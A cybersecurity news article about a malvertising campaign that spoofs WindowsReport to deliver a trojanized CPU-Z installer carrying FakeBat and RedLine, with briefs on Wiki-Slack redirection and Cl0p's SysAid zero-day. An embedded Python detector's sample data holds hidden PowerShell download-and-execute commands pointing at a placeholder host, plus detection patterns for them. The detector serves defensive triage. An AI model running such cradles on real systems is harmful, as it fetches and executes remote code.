
Malicious Installers Concealed Behind a Counterfeit Windows News Portal



A recently uncovered malvertising campaign is using fake websites that closely imitate a legitimate Windows news portal.

Its objective: to distribute a trojanized installer disguised as the popular system-profiling tool CPU-Z.

A Deviation from the Norm

Most malvertising campaigns clone the vendor site of a well-known software product. This one takes a different route: the decoy imitates WindowsReport[.]com and targets users searching for CPU-Z on major search engines, notably Google.

The attackers run crafted search ads that, once clicked, redirect targeted users to the decoy portal (workspace-app[.]online).

Visitors who do not match the campaign's targeting criteria are instead served an innocuous blog, a cloaking technique used to avoid detection.

Behind the Scenes: Unpacking the Malicious Payload

The payload is a digitally signed MSI installer hosted on the decoy site. Inside it is a malicious PowerShell script that acts as a loader, tracked as FakeBat (also known as EugenLoader).

The loader then deploys RedLine Stealer on the compromised host. Analysts suspect the choice to impersonate Windows Report is deliberate: users commonly download utilities from such portals rather than from the vendor's official site. A valid code-signing signature on the MSI only shows that someone held a signing certificate; it does not prove the installer came from CPU-Z's developer.
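Because the loader is a PowerShell script launched from inside an installer, one practical detection is to look for installer processes spawning a shell with loader-style arguments. The Python below is an added example, not code from this page or from any vendor: it runs a heuristic over a handful of constructed Sysmon-style process-creation records (the field names parent, image and cmdline are assumptions, as is the sample cradle URL example.invalid) and decodes any -EncodedCommand payload so the analyst sees what the loader actually runs.

```python
import base64
import re

# Constructed sample events (not real telemetry). Field names are assumptions
# chosen for this example; map them onto your own EDR or Sysmon schema.

def encode_powershell(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Hypothetical download cradle; the host is a placeholder, not a real indicator.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage2')"

SAMPLE_EVENTS = [
    {   # installer spawning an encoded, hidden PowerShell: the pattern to catch
        "id": 1,
        "parent": r"C:\Windows\System32\msiexec.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell.exe -nop -w hidden -ep bypass -EncodedCommand " + encode_powershell(CRADLE),
    },
    {   # ordinary admin script launched from Explorer: benign
        "id": 2,
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1",
    },
    {   # installer launching the application it just installed: benign
        "id": 3,
        "parent": r"C:\Windows\System32\msiexec.exe",
        "image": r"C:\Program Files\CPUID\CPU-Z\cpuz.exe",
        "cmdline": "cpuz.exe",
    },
    {   # same cradle, one hop removed via cmd.exe and not encoded
        "id": 4,
        "parent": r"C:\Windows\System32\msiexec.exe",
        "image": r"C:\Windows\System32\cmd.exe",
        "cmdline": 'cmd.exe /c powershell -w hidden -c "' + CRADLE + '"',
    },
]

INSTALLER_PARENTS = {"msiexec.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Each pattern is applied to the raw command line plus the decoded script.
SUSPICIOUS_PATTERNS = [
    ("encoded_command", re.compile(r"-(encodedcommand|enc|ec|e)\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("execution_policy_bypass", re.compile(r"-(executionpolicy|ep)\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-(windowstyle|w)\s+hidden", re.I)),
    ("download_cradle", re.compile(r"\b(iex|invoke-expression)\b|downloadstring|downloadfile", re.I)),
]

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline: str):
    """Return the script carried by an -EncodedCommand argument, or None if absent/invalid."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-encodedcommand", "-enc", "-ec", "-e"):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def flag_installer_launched_shells(events):
    """Flag shells spawned by an installer whose command line carries loader-style indicators."""
    findings = []
    for ev in events:
        if basename(ev["parent"]) not in INSTALLER_PARENTS:
            continue
        child = basename(ev["image"])
        if child not in SHELL_IMAGES:
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        # Search raw and decoded text together so encoding does not hide the cradle.
        haystack = ev["cmdline"] + "\n" + (decoded or "")
        indicators = [name for name, pat in SUSPICIOUS_PATTERNS if pat.search(haystack)]
        if indicators:
            findings.append({"id": ev["id"], "child": child, "indicators": indicators, "decoded": decoded})
    return findings

if __name__ == "__main__":
    for f in flag_installer_launched_shells(SAMPLE_EVENTS):
        print(f"event {f['id']}: msiexec.exe -> {f['child']}, indicators={f['indicators']}")
        if f["decoded"]:
            print("  decoded:", f["decoded"])
```

Legitimate MSI custom actions do occasionally spawn PowerShell, so treat a hit as a triage signal rather than a verdict, and enrich it with the installer's signer, where it was downloaded from, and what the spawned shell connected to.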

Beyond Isolation: A Wider Landscape of Threats

This incident is not an isolated occurrence. Deceptive Google Ads have repeatedly served as a malware distribution channel.

Recently, cybersecurity firm eSentire shed light on an updated Nitrogen campaign, showing how the same tactics paved the way for a BlackCat ransomware attack.

eSentire also documented two further campaigns that used drive-by downloads, steering users to dubious websites and distributing several malware families, including NetWire RAT, DarkGate, and DanaBot.

Threat actors are also increasingly turning to adversary-in-the-middle (AiTM) phishing kits such as NakedPages, Strox, and DadSec to bypass multi-factor authentication and take over targeted accounts.

Enter the Wiki-Slack Attack: A Novel Intrusion Method

eSentire also described a novel technique it calls the Wiki-Slack attack. It is a redirection tactic that steers victims to an attacker-controlled website by manipulating the end of the first paragraph of a Wikipedia article that is then shared on Slack.

The attack abuses a Slack quirk that mishandles the whitespace between paragraphs, so that a link is generated automatically when the Wikipedia URL is previewed in the messaging platform.

Cl0p Alert Again: Zero Day Exploit 

Microsoft has reported that the threat group Lace Tempest, which operates Cl0p ransomware, exploited a zero-day flaw (CVE-2023-47246) in SysAid IT support software.

The vulnerability allows code execution in on-premises installations. Lace Tempest used its SysAid access to deploy a loader for the Gracewire malware, followed by hands-on-keyboard activity such as lateral movement and ransomware deployment.

SysAid has fixed the flaw in version 23.3.36. Separately, the FBI warns of a rising trend in which ransomware attackers abuse third-party vendors and legitimate tools for data theft and extortion. Organizations running on-premises SysAid should apply the patch and check for signs of exploitation without delay.

Guardrails Needed: Ethical Considerations and Defensive Measures

Malicious installers, malware, and zero-day exploits are not going away. As organizations hardened their email against phishing, threat actors shifted to another entry point: browser-based social engineering.

Knowing how to defend against browser-based attacks, SEO poisoning, and malvertising through Google Ads is now essential: download software only from the vendor's official site, treat sponsored search results with suspicion, and check that an installer's code-signing certificate names the expected publisher rather than merely that a signature is present.

Effective endpoint monitoring remains the most important control, because it catches the loader and the stealer regardless of which lure delivered them.

Author: Marrium Akhtar

Date: November 10, 2023


Marrium is a dedicated digital Marketer and an SEO enthusiast who is skilled in cracking SEO codes. Other than work, she loves to stream, eat, and repeat.
